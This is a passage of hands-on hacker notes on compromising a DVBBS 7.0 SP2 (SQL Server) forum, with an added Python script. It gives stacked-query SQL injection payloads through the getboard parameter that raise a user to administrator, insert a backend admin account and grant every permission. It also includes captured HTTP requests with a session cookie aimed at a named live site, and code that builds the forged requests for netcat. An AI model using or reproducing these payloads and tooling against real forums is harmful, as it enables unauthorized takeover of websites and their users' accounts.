Exams are coming up, so I haven't had time to read the code; I only roughly know where the vulnerability is, haha! These are just test notes, but they are quite hands-on.
First of all, everything I tested was DVBBS 7.0 SP2. With the ACCESS version you cannot get into the backend, because Access does not support stacked (multi-statement) queries; with the SQL Server version you can get into the backend and possibly obtain a webshell. So the SQL version is what is tested here. The target's footer reads:
Powered By :Dvbbs Version 7.0.0 Sp2 sql
Copyright © 2002 - 2005 Aspsky.Net
Execution time: 46.87500 ms. Database queries: 3.
Current template style: [Default template]
First register an account, then edit your avatar and capture the packet; modify the packet, resubmit it, and that is it. Since someone has already written an exploit tool for this vulnerability, just use the tool, because everything below has to be done by hand!
...........some details omitted; at this point I have front-end (board) administrator privileges!
Next, use another vulnerability to take the backend.
1. First post a thread and pin it, or pin an existing thread (you are a front-end administrator now), and capture the packet:
POST /admin_postings.asp?action=istop HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.hlhzw.com/admin_postings.asp?action=istop
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: www.hlhzw.com
Content-Length: 138
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: www%2Ehlhzw%2Ecom%2F=UserID=560&usercookies=0&StatUserID=202109665984&userclass=%B9%DC%C0%ED%D4%B1&username=wskhaha&password=Y1tGw4j886XtB846&userhidden=2; ASPSESSIONIDSSSQBBQS=FDHLDMFCLJKIBPAKMDHMLDLA; upNum=0; Dvbbs=
istopaction=1&boardID=12&ID=362&title=&content=te&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=12&submit=%C8%B7%C8%CF%B2%D9%D7%F7
Now modify the packet above:
Change getboard=12 to: 12,12);update [dv_user] set usergroupid=1 where userid=202109665984;--
The original `12` is replaced by the whole string that follows (it begins with the same `12`, so the query closes cleanly and the stacked statement runs after it); the userid is the ID number from the packet above (the cookie carries both UserID=560 and StatUserID=202109665984; the payload here uses the latter).
Fully percent-encoded (every character, digits included), the payload becomes:
%31%32%2C%31%32%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%30%32%31%30%39%36%36%35%39%38%34%3B%2D%2D
Reading it in UE (UltraEdit) gives 210 bytes (70 characters x 3).
So change Content-Length: 138 in the packet to 138+210-2=346 (the 2 is the original `12` that was removed).
Once modified, submit it with NC (netcat).
2. Next, add a backend admin account:
12,12);insert into dv_admin (username,[password],adduser) values('xysky','49ba59abbe56e057','wskhaha');--
Encoded:
%31%32%2C%31%32%29%3B%69%6E%73%65%72%74%20%69%6E%74%6F%20%64%76%5F%61%64%6D%69%6E%20%28%75%73%65%72%6E%61%6D%65%2C%5B%70%61%73%73%77%6F%72%64%5D%2C%61%64%64%75%73%65%72%29%20%76%61%6C%75%65%73%D%D%A%28%27%78%79%73%6B%79%27%2C%27%34%39%62%61%35%39%61%62%62%65%35%36%65%30%35%37%27%2C%27%77%73%6B%68%61%68%61%27%29%3B%2D%2D
Bytes: 138+321-2=457. Submitted OK. (The `%D%D%A` sequence inside the encoded string appears to be an encoded line break picked up when the payload wrapped in the editor; the payload on its own is 105 characters and encodes to 315 bytes.)
3. Grant privileges:
12,12);update dv_admin set flag='1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36' where username='xysky';--
Encoded:
%31%32%2C%31%32%29%3B%75%70%64%61%74%65%20%64%76%5F%61%64%6D%69%6E%20%73%65%74%20%D%D%A%66%6C%61%67%3D%27%31%2C%32%2C%33%2C%34%2C%35%2C%36%2C%37%2C%38%2C%39%2C%31%30%2C%31%31%2C%31%32%2C%31%33%2C%31%34%2C%31%35%2C%31%36%2C%31%37%2C%31%38%2C%31%39%2C%32%30%2C%32%31%2C%32%32%2C%32%33%2C%32%34%2C%32%35%2C%32%36%2C%32%37%2C%32%38%2C%32%39%2C%33%30%2C%33%31%2C%33%32%2C%33%33%D%D%A%2C%33%34%2C%33%35%2C%33%36%27%20%77%68%65%72%65%20%75%73%65%72%6E%61%6D%65%3D%27%78%79%73%6B%79%27%3B%2D%2D
Bytes: 486+138-2=622. OK, submit. (Again, the two `%D%D%A` sequences are encoded line breaks; the payload on its own is 158 characters and encodes to 474 bytes.)
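The three steps above are the same mechanical job each time: percent-encode the stacked-query payload, splice it into the captured body in place of `getboard=12`, and recompute Content-Length. The script below does that arithmetic for all three payloads so the numbers can be checked instead of counted in UltraEdit. It is an added example, not code from the original notes or from Dvbbs; it reproduces the page's captured body and payloads (without the stray line-break encodings), and the cookie value and the reduced header set in `build_request` are placeholders that would be replaced with the captured ones.

```python
import re

# Captured POST body from the pinned-post request on the page (138 bytes).
ORIGINAL_BODY = (
    "istopaction=1&boardID=12&ID=362&title=&content=te&doWealth=0&dousercp=0"
    "&douserep=0&msg=&ismsg=&getboard=12&submit=%C8%B7%C8%CF%B2%D9%D7%F7"
)

# The three stacked-query payloads from the page, reproduced without the
# stray line breaks that crept into the author's encoded versions.
FLAGS = ",".join(str(i) for i in range(1, 37))  # '1,2,...,36'
PAYLOADS = {
    "usergroup": "12,12);update [dv_user] set usergroupid=1 where userid=202109665984;--",
    "add_admin": "12,12);insert into dv_admin (username,[password],adduser) "
                 "values('xysky','49ba59abbe56e057','wskhaha');--",
    "grant": "12,12);update dv_admin set flag='" + FLAGS + "' where username='xysky';--",
}


def encode_all(payload: str) -> str:
    """Percent-encode every byte, digits and letters included, exactly as the
    page's converter does ('1' -> '%31', ';' -> '%3B'). Output is always 3x."""
    return "".join("%%%02X" % b for b in payload.encode("latin-1"))


def inject_getboard(body: str, encoded_payload: str) -> str:
    """Swap the value of the getboard= field for the encoded payload.
    Only getboard is touched; boardID=12 earlier in the body stays as it is."""
    new_body, n = re.subn(r"(?<=&getboard=)[^&]*", lambda _: encoded_payload, body)
    if n != 1:
        raise ValueError("getboard field not found exactly once")
    return new_body


def content_length(body: str) -> int:
    """Content-Length is the byte length of the body. The body is pure ASCII,
    so this is the same as the page's hand arithmetic 138 + encoded - 2."""
    return len(body.encode("ascii"))


def build_request(host: str, path: str, cookie: str, body: str) -> bytes:
    """Assemble a raw HTTP/1.1 request (CRLF line endings) to pipe into netcat.
    Placeholder header set; the real request would carry the captured headers."""
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {content_length(body)}",
        f"Cookie: {cookie}",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode("ascii")


def forge(name: str) -> dict:
    """Encoded payload, modified body and Content-Length for one of the three steps."""
    enc = encode_all(PAYLOADS[name])
    body = inject_getboard(ORIGINAL_BODY, enc)
    return {"encoded": enc, "body": body, "content_length": content_length(body)}


if __name__ == "__main__":
    for name in PAYLOADS:
        r = forge(name)
        print(f"{name}: encoded {len(r['encoded'])} bytes -> Content-Length {r['content_length']}")
    # Placeholder cookie: substitute the captured front-end admin cookie here.
    cookie = "www%2Ehlhzw%2Ecom%2F=UserID=560&username=wskhaha"
    req = build_request("www.hlhzw.com", "/admin_postings.asp?action=istop",
                        cookie, forge("usergroup")["body"])
    print(req.decode("ascii"))  # save to req.txt and run: nc www.hlhzw.com 80 < req.txt
```

Running it gives Content-Length 346 for step 1, matching the page, and 451 and 610 for steps 2 and 3, the values you get when no line break is encoded into the payload.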
4. Enter the backend.
Unfortunately none of it worked. Damn! I had just gotten into the backend on Huaxia's site a moment ago; something small seems to have gone wrong here.
OK, that's it; I have no time. I don't want to say more about capturing, modifying and resubmitting the packets; there is nothing technical to it.
Finally: a patch for this vulnerability is already out. I haven't tested version 7.1 yet; I will test it after the exams!